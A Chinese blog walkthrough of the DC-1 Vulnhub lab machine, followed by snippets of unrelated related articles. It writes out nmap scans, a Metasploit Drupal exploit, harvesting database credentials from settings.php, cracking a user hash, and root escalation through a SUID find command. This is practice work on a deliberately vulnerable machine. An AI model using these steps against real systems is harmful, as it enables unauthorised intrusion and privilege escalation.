DC-1

DC-1

时间：2024-07-31 11:40:15浏览次数：13

标签：bin 查看 passwd DC usr root find

信息搜集

探测局域网内存活主机

nmap -sP 192.168.19.128/24

发现192.168.19.139,扫描开放端口

nmap -p- 192.168.19.139

发现开放如下四个端口

22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
47540/tcp open  unknown

我们访问80端口发现是个Drupal框架,但是没登录的时候提供的页面比之前的少

渗透

只给了个登录页面,我们尝试使用sqlmap跑一下,失败了.使用searchsploit搜索Drupal的漏洞.

searchsploit Drupal

发现这个版本确实有不少漏洞,包括SQL注入以及相关的RCE等.
使用msf自动化工具去打,msf是一种自动化漏洞利用工具,收录了多数的CVE漏洞,能够让用户只输入参数进行漏洞测试.

msfconsole

进入msf交互页面.

search Drupal

搜索和Drupal相关的攻击.

我们使用1去进行(因为0试过了不好使,虽然他描述的确实是我们需要的)

use 1

然后我们查看需要配置的参数

show options

发现需要配置的参数只有RHOSTS没有配置

set RHOSTS 192.168.19.139

然后直接运行

run
shell
python -c 'import pty;pty.spawn("/bin/bash")'

成功拿到了交互式的shell.
sudo是不允许运行的,查看当前目录

发现文件flag1.txt,查看内容如下

Every good CMS needs a config file - and so do you.

可以看出来需要寻找config file.进入sites->default目录,发现settings.php文件,查看内容发现如下

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */
$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

那么我们就知道了mysql数据库的用户名和密码.登录mysql.

mysql -udbuser -pR0ck3t

查看数据库

show databases;

切换到durpaldb数据库,查看tables

use durpaldb;
show tables;

发现其中有users表,查看具体内容

select * from users;

这样显示的有点乱,我们就只查看name和pass

 select name,pass from users;

可以看到pass被进行了加密,使用cmd5爆破得到53cr3t,回到web端进行登录
在content中找到了flag3,查看内容如下

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

解读一下,意思是需要特殊的权限(root权限)去寻找(find命令) /etc/passwd,但是需要去执行命令去看/etc/shadow(存储密码的文件,需要root权限查看)中有什么
查看/etc/passwd发现

在home中有flag4,查看内容

Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?

提示我们需要提权.
使用find命令查看suid root文件

find / -user root -perm -4000 -print 2>/dev/null

结果如下

/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs

我们看到,这个find命令是由suid位的,因此可以进行提权

find /etc/passwd -exec '/bin/sh' \;

这条命令会对/etc/passwd下的每一个文件执行命令/bin/sh,由于只有这一个文件,文件的所有者为root,那么会以root权限启动一个shell,实现提权.注意:\不能省略,因为需要在新的一行启动shell
切换到root home查看flag

至此DC系列结束,共用时一周.准备开启awd的旅程.

标签：bin,查看,passwd,DC,usr,root,find
From： https://www.cnblogs.com/merak-lbz/p/18334294

DC-9
DC-9信息搜集探测局域网内存活主机nmap-sP192.168.19.128/24发现主机192.168.19.138,扫描开放端口nmap-p-192.168.19.138发现只有80端口开放.访问发现是一个员工信息管理系统.渗透用whatweb扫描查看网站信息,发现啥也没有.发现在search页面中存在搜索框可以查询员......
DC综合时set_ideal_network -no_propagate
在DesignCompiler(DC)综合过程中，set_ideal_network命令用于指定理想网络（idealnetwork），这些网络通常不会被综合工具修改。这些网络的延迟和负载被忽略，从而简化了综合过程。举例set_ideal_network-no_propagate[all_high_fanout-nets-threshold256] set_ideal_ne......
dicom 处理dcm 文件
查看文件dcmdump00268c30-183f-4b2e-89c2-39f8bd565a90.dcm查看指定tagdcmdump--search"StudyInstanceUID"00268c30-183f-4b2e-89c2-39f8bd565a90.dcm修改指定tag输出文件夹后缀bakdcmodify-ma"(0x0008,0x0080)=AnonymousHospital"00268c30-183......
adobe acrobat DC如何彻底解决自动更新的问题
有客户反应已经按照adobeacrobatDC下载安装界面的教程删除了升级文件，但是还是会时不时的跳出更新，只能重新安装，有没有其他的更好的方法呢？解决方法如下：一、首先删除/Library/ApplicationSupport/Adobe/ARMDC/Application路径下的update文件，具体方法如下：1.点击左上角前往，选择前......
Flink-CDC
Flink-CDC（FlinkChangeDataCapture）是一个基于Flink计算框架的数据集成工具，它实现了对数据库变更数据的捕获、处理和传输，支持全量和增量数据的一体化读取。下面将从多个方面对Flink-CDC进行详细的解析。一、Flink-CDC概述1.1CDC简介CDC（ChangeDataCapture）是变更数据捕......
【Vulnhub系列】Vulnhub_DC-1靶场渗透（原创）
【Vulnhub系列靶场】Vulnhub_DC-1靶场渗透原文转载已经过授权原文链接：Lusen的小窝-学无止尽，不进则退(lusensec.github.io)一、环境准备1、在百度网盘中下载DC-1靶场。DC-1靶场受virtualbox的影响，在VM中直接打开是扫描不到IP的，我们需要先解决这个问题：【其他经验】V......
stable diffusion中的UNet2DConditionModel代码解读
UNet2DConditionModel总体结构图片来自于https://zhuanlan.zhihu.com/p/635204519stablediffusion运行unet部分的代码。noise_pred=self.unet(sample=latent_model_input,#(2,4,64,64)生成的latenttimestep=t,#时刻tencoder_hidden_states=pro......
AP8660 DC-DC升压恒压芯片 PWM模式内置24W 充电器方案
产品描述AP8860一款宽电压范围降压型DC-DC电源管理芯片，内部集成功率MOS管、使能开关控制、基准电源、误差放大器、过热保护、限流保护、短路保护等功能，非常适合宽电压输入降压使用。AP8860带使能控制，可以大大节省外围器件，更加适合电池场合使用，具有很高的方案性价比。AP8660......
01-从WordCount程序理解Spark术语及术语间的关系
1.应用程序（Application）通过下面的代码设置应用程序名称，设置后再UI中可以看到相应的名称。//1.设置Application的名称valconf=newSparkConf()conf.setAppName("WordCount")conf.setMaster("local")2.作业（Job）Job由scala的执行算子生成，每个执行的算子会调起runjob，从而......
DIDCTF-流量分析
wireshark0某日接到客户应急需求，客户连接工业控制系统的核心网络设备遭到入侵，初步推测可能是网络设备的远程登录密码被破解，请通过对给出的流量包分析，得到黑客登录网络设备后窃取的机密数据key1。flag为8位长度字符串flag：HYDw29ePwireshark0.5下列抓包⽂件中包含了⽤户登录⽹......

信息搜集

渗透

相关文章

赞助商

阅读排行